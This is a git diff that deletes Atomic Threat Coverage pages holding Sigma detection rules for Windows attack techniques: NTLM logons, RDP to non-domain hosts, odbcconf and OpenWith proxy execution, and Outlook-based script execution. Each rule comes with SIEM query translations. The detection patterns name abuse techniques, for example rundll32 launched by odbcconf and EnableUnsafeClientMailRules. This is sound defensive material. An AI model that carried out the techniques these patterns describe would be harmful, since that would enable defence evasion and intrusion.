-| **References**           | <ul><li>[https://twitter.com/JohnLaTwC/status/1004895028995477505](https://twitter.com/JohnLaTwC/status/1004895028995477505)</li><li>[https://goo.gl/PsqrhT](https://goo.gl/PsqrhT)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1550.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: NTLM Logon
-id: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b
-status: experimental
-description: Detects logons using NTLM, which could be caused by a legacy source or attackers
-references:
-    - https://twitter.com/JohnLaTwC/status/1004895028995477505
-    - https://goo.gl/PsqrhT
-author: Florian Roth
-date: 2018/06/08
-tags:
-    - attack.lateral_movement
-    - attack.t1075
-    - attack.t1550.002
-logsource:
-    product: windows
-    service: ntlm
-    definition: Reqiures events from Microsoft-Windows-NTLM/Operational
-detection:
-    selection:
-        EventID: 8002
-        CallingProcessName: '*'  # We use this to avoid false positives with ID 8002 on other log sources if the logsource isn't set correctly
-    condition: selection
-falsepositives:
-    - Legacy hosts
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-NTLM/Operational | where {($_.ID -eq "8002" -and $_.message -match "CallingProcessName.*.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-NTLM\/Operational" AND winlog.event_id:"8002" AND winlog.event_data.CallingProcessName.keyword:*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/98c3bcf1-56f2-49dc-9d8d-c66cf190238b <<EOF
-{
-  "metadata": {
-    "title": "NTLM Logon",
-    "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1075",
-      "attack.t1550.002"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-NTLM\\/Operational\" AND winlog.event_id:\"8002\" AND winlog.event_data.CallingProcessName.keyword:*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-NTLM\\/Operational\" AND winlog.event_id:\"8002\" AND winlog.event_data.CallingProcessName.keyword:*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'NTLM Logon'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"8002" AND CallingProcessName.keyword:*)
-```
-
-
-### splunk
-    
-```
-(source="Microsoft-Windows-NTLM/Operational" EventCode="8002" CallingProcessName="*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-NTLM/Operational" event_id="8002" CallingProcessName="*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*8002)(?=.*.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_rdp.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_rdp.md
deleted file mode 100644
index c5f0bc3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ntlm_rdp.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Potential Remote Desktop Connection to Non-Domain Host       |
-|:-------------------------|:------------------|
-| **Description**          | Detects logons using NTLM to hosts that are potentially not part of the domain. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1219: Remote Access Software](https://attack.mitre.org/techniques/T1219)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1219: Remote Access Software](../Triggers/T1219.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Host connections to valid domains, exclude these.</li><li>Host connections not using host FQDN.</li><li>Host connections to external legitimate domains.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[n/a](n/a)</li></ul>  |
-| **Author**               | James Pemberton |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Potential Remote Desktop Connection to Non-Domain Host
-id: ce5678bb-b9aa-4fb5-be4b-e57f686256ad
-status: experimental
-description: Detects logons using NTLM to hosts that are potentially not part of the domain.
-references:
-    - n/a
-author: James Pemberton
-date: 2020/05/22
-tags:
-    - attack.command_and_control
-    - attack.t1219
-logsource:
-    product: windows
-    service: ntlm
-    definition: Requires events from Microsoft-Windows-NTLM/Operational
-detection:
-    selection:
-        EventID: 8001
-        TargetName: TERMSRV*
-    condition: selection
-fields:
-    - Computer
-    - UserName
-    - DomainName
-    - TargetName
-falsepositives:
-    - Host connections to valid domains, exclude these.
-    - Host connections not using host FQDN.
-    - Host connections to external legitimate domains.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-NTLM/Operational | where {($_.ID -eq "8001" -and $_.message -match "TargetName.*TERMSRV.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-NTLM\/Operational" AND winlog.event_id:"8001" AND TargetName.keyword:TERMSRV*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ce5678bb-b9aa-4fb5-be4b-e57f686256ad <<EOF
-{
-  "metadata": {
-    "title": "Potential Remote Desktop Connection to Non-Domain Host",
-    "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.",
-    "tags": [
-      "attack.command_and_control",
-      "attack.t1219"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-NTLM\\/Operational\" AND winlog.event_id:\"8001\" AND TargetName.keyword:TERMSRV*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-NTLM\\/Operational\" AND winlog.event_id:\"8001\" AND TargetName.keyword:TERMSRV*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Potential Remote Desktop Connection to Non-Domain Host'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n  Computer = {{_source.Computer}}\n  UserName = {{_source.UserName}}\nDomainName = {{_source.DomainName}}\nTargetName = {{_source.TargetName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"8001" AND TargetName.keyword:TERMSRV*)
-```
-
-
-### splunk
-    
-```
-(source="Microsoft-Windows-NTLM/Operational" EventCode="8001" TargetName="TERMSRV*") | table Computer,UserName,DomainName,TargetName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-NTLM/Operational" event_id="8001" TargetName="TERMSRV*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*8001)(?=.*TERMSRV.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_odbcconf.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_odbcconf.md
deleted file mode 100644
index 674e267..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_odbcconf.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Application Whitelisting Bypass via DLL Loaded by odbcconf.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects defence evasion attempt via odbcconf.exe execution to load DLL |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate use of odbcconf.exe by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Odbcconf.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Odbcconf.yml)</li><li>[https://twitter.com/Hexacorn/status/1187143326673330176](https://twitter.com/Hexacorn/status/1187143326673330176)</li></ul>  |
-| **Author**               | Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
-id: 65d2be45-8600-4042-b4c0-577a1ff8a60e
-description: Detects defence evasion attempt via odbcconf.exe execution to load DLL
-status: experimental
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Odbcconf.yml
-    - https://twitter.com/Hexacorn/status/1187143326673330176
-author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/25
-modified: 2019/11/07
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1218
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-        Image|endswith: '\odbcconf.exe'
-        CommandLine|contains:
-            - '-f'
-            - 'regsvr'
-    selection_2:
-        ParentImage|endswith: '\odbcconf.exe'
-        Image|endswith: '\rundll32.exe'
-    condition: selection_1 or selection_2
-level: medium
-falsepositives:
-    - Legitimate use of odbcconf.exe by legitimate user
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\odbcconf.exe" -and ($_.message -match "CommandLine.*.*-f.*" -or $_.message -match "CommandLine.*.*regsvr.*")) -or ($_.message -match "ParentImage.*.*\\odbcconf.exe" -and $_.message -match "Image.*.*\\rundll32.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\odbcconf.exe AND winlog.event_data.CommandLine.keyword:(*\-f* OR *regsvr*)) OR (winlog.event_data.ParentImage.keyword:*\\odbcconf.exe AND winlog.event_data.Image.keyword:*\\rundll32.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/65d2be45-8600-4042-b4c0-577a1ff8a60e <<EOF
-{
-  "metadata": {
-    "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe",
-    "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\odbcconf.exe AND winlog.event_data.CommandLine.keyword:(*\\-f* OR *regsvr*)) OR (winlog.event_data.ParentImage.keyword:*\\\\odbcconf.exe AND winlog.event_data.Image.keyword:*\\\\rundll32.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\odbcconf.exe AND winlog.event_data.CommandLine.keyword:(*\\-f* OR *regsvr*)) OR (winlog.event_data.ParentImage.keyword:*\\\\odbcconf.exe AND winlog.event_data.Image.keyword:*\\\\rundll32.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Application Whitelisting Bypass via DLL Loaded by odbcconf.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\odbcconf.exe AND CommandLine.keyword:(*\-f* *regsvr*)) OR (ParentImage.keyword:*\\odbcconf.exe AND Image.keyword:*\\rundll32.exe))
-```
-
-
-### splunk
-    
-```
-((Image="*\\odbcconf.exe" (CommandLine="*-f*" OR CommandLine="*regsvr*")) OR (ParentImage="*\\odbcconf.exe" Image="*\\rundll32.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\odbcconf.exe" CommandLine IN ["*-f*", "*regsvr*"]) OR (ParentImage="*\\odbcconf.exe" Image="*\\rundll32.exe")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\odbcconf\.exe)(?=.*(?:.*.*-f.*|.*.*regsvr.*)))|.*(?:.*(?=.*.*\odbcconf\.exe)(?=.*.*\rundll32\.exe))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_openwith.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_openwith.md
deleted file mode 100644
index e6ad2f4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_openwith.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | OpenWith.exe Executes Specified Binary       |
-|:-------------------------|:------------------|
-| **Description**          | The OpenWith.exe executes other binary |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate use of OpenWith.exe by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml)</li><li>[https://twitter.com/harr0ey/status/991670870384021504](https://twitter.com/harr0ey/status/991670870384021504)</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community (rule), @harr0ey (idea) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: OpenWith.exe Executes Specified Binary
-id: cec8e918-30f7-4e2d-9bfa-a59cc97ae60f
-status: experimental
-description: The OpenWith.exe executes other binary
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml
-    - https://twitter.com/harr0ey/status/991670870384021504
-author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
-date: 2019/10/12
-modified: 2019/11/04
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1218
-level: high
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\OpenWith.exe'
-        CommandLine|contains: '/c'
-    condition: selection
-falsepositives:
-    - Legitimate use of OpenWith.exe by legitimate user
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\OpenWith.exe" -and $_.message -match "CommandLine.*.*/c.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\OpenWith.exe AND winlog.event_data.CommandLine.keyword:*\/c*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cec8e918-30f7-4e2d-9bfa-a59cc97ae60f <<EOF
-{
-  "metadata": {
-    "title": "OpenWith.exe Executes Specified Binary",
-    "description": "The OpenWith.exe executes other binary",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\OpenWith.exe AND winlog.event_data.CommandLine.keyword:*\\/c*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\OpenWith.exe AND winlog.event_data.CommandLine.keyword:*\\/c*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'OpenWith.exe Executes Specified Binary'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\OpenWith.exe AND CommandLine.keyword:*\/c*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\OpenWith.exe" CommandLine="*/c*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\OpenWith.exe" CommandLine="*/c*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\OpenWith\.exe)(?=.*.*/c.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook.md
deleted file mode 100644
index 191ef2f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Suspicious Execution from Outlook       |
-|:-------------------------|:------------------|
-| **Description**          | Detects EnableUnsafeClientMailRules used for Script Execution from Outlook |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1202: Indirect Command Execution](https://attack.mitre.org/techniques/T1202)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1202: Indirect Command Execution](../Triggers/T1202.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/sensepost/ruler](https://github.com/sensepost/ruler)</li><li>[https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html](https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html)</li></ul>  |
-| **Author**               | Markus Neis |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Execution from Outlook
-id: e212d415-0e93-435f-9e1a-f29005bb4723
-status: experimental
-description: Detects EnableUnsafeClientMailRules used for Script Execution from Outlook
-references:
-    - https://github.com/sensepost/ruler
-    - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
-tags:
-    - attack.execution
-    - attack.t1059
-    - attack.t1202
-author: Markus Neis
-date: 2018/12/27
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    clientMailRules:
-        CommandLine: '*EnableUnsafeClientMailRules*'
-    outlookExec:
-        ParentImage: '*\outlook.exe'
-        CommandLine: \\\\*\\*.exe
-    condition: clientMailRules or outlookExec
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "CommandLine.*.*EnableUnsafeClientMailRules.*" -or ($_.message -match "ParentImage.*.*\\outlook.exe" -and $_.message -match "CommandLine.*\\\\.*\\.*.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*EnableUnsafeClientMailRules* OR (winlog.event_data.ParentImage.keyword:*\\outlook.exe AND winlog.event_data.CommandLine.keyword:\\\\*\\*.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e212d415-0e93-435f-9e1a-f29005bb4723 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Execution from Outlook",
-    "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook",
-    "tags": [
-      "attack.execution",
-      "attack.t1059",
-      "attack.t1202"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*EnableUnsafeClientMailRules* OR (winlog.event_data.ParentImage.keyword:*\\\\outlook.exe AND winlog.event_data.CommandLine.keyword:\\\\\\\\*\\\\*.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*EnableUnsafeClientMailRules* OR (winlog.event_data.ParentImage.keyword:*\\\\outlook.exe AND winlog.event_data.CommandLine.keyword:\\\\\\\\*\\\\*.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Execution from Outlook'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*EnableUnsafeClientMailRules* OR (ParentImage.keyword:*\\outlook.exe AND CommandLine.keyword:\\\\*\\*.exe))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*EnableUnsafeClientMailRules*" OR (ParentImage="*\\outlook.exe" CommandLine="\\\\*\\*.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine="*EnableUnsafeClientMailRules*" OR (ParentImage="*\\outlook.exe" CommandLine="\\\\*\\*.exe")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.*EnableUnsafeClientMailRules.*|.*(?:.*(?=.*.*\outlook\.exe)(?=.*\\\\.*\\.*\.exe))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook_temp.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook_temp.md
deleted file mode 100644
index b3de77e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_outlook_temp.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Execution in Outlook Temp Folder       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious program execution in Outlook temp folder |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1193: Spearphishing Attachment](https://attack.mitre.org/techniques/T1193)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1566.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Execution in Outlook Temp Folder
-id: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39
-status: experimental
-description: Detects a suspicious program execution in Outlook temp folder
-author: Florian Roth
-date: 2019/10/01
-tags:
-    - attack.initial_access
-    - attack.t1193
-    - attack.t1566.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\Temporary Internet Files\Content.Outlook\\*'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\Temporary Internet Files\\Content.Outlook\\.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:*\\Temporary\ Internet\ Files\\Content.Outlook\\*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a018fdc3-46a3-44e5-9afb-2cd4af1d4b39 <<EOF
-{
-  "metadata": {
-    "title": "Execution in Outlook Temp Folder",
-    "description": "Detects a suspicious program execution in Outlook temp folder",
-    "tags": [
-      "attack.initial_access",
-      "attack.t1193",
-      "attack.t1566.001"
-    ],
-    "query": "winlog.event_data.Image.keyword:*\\\\Temporary\\ Internet\\ Files\\\\Content.Outlook\\\\*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:*\\\\Temporary\\ Internet\\ Files\\\\Content.Outlook\\\\*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
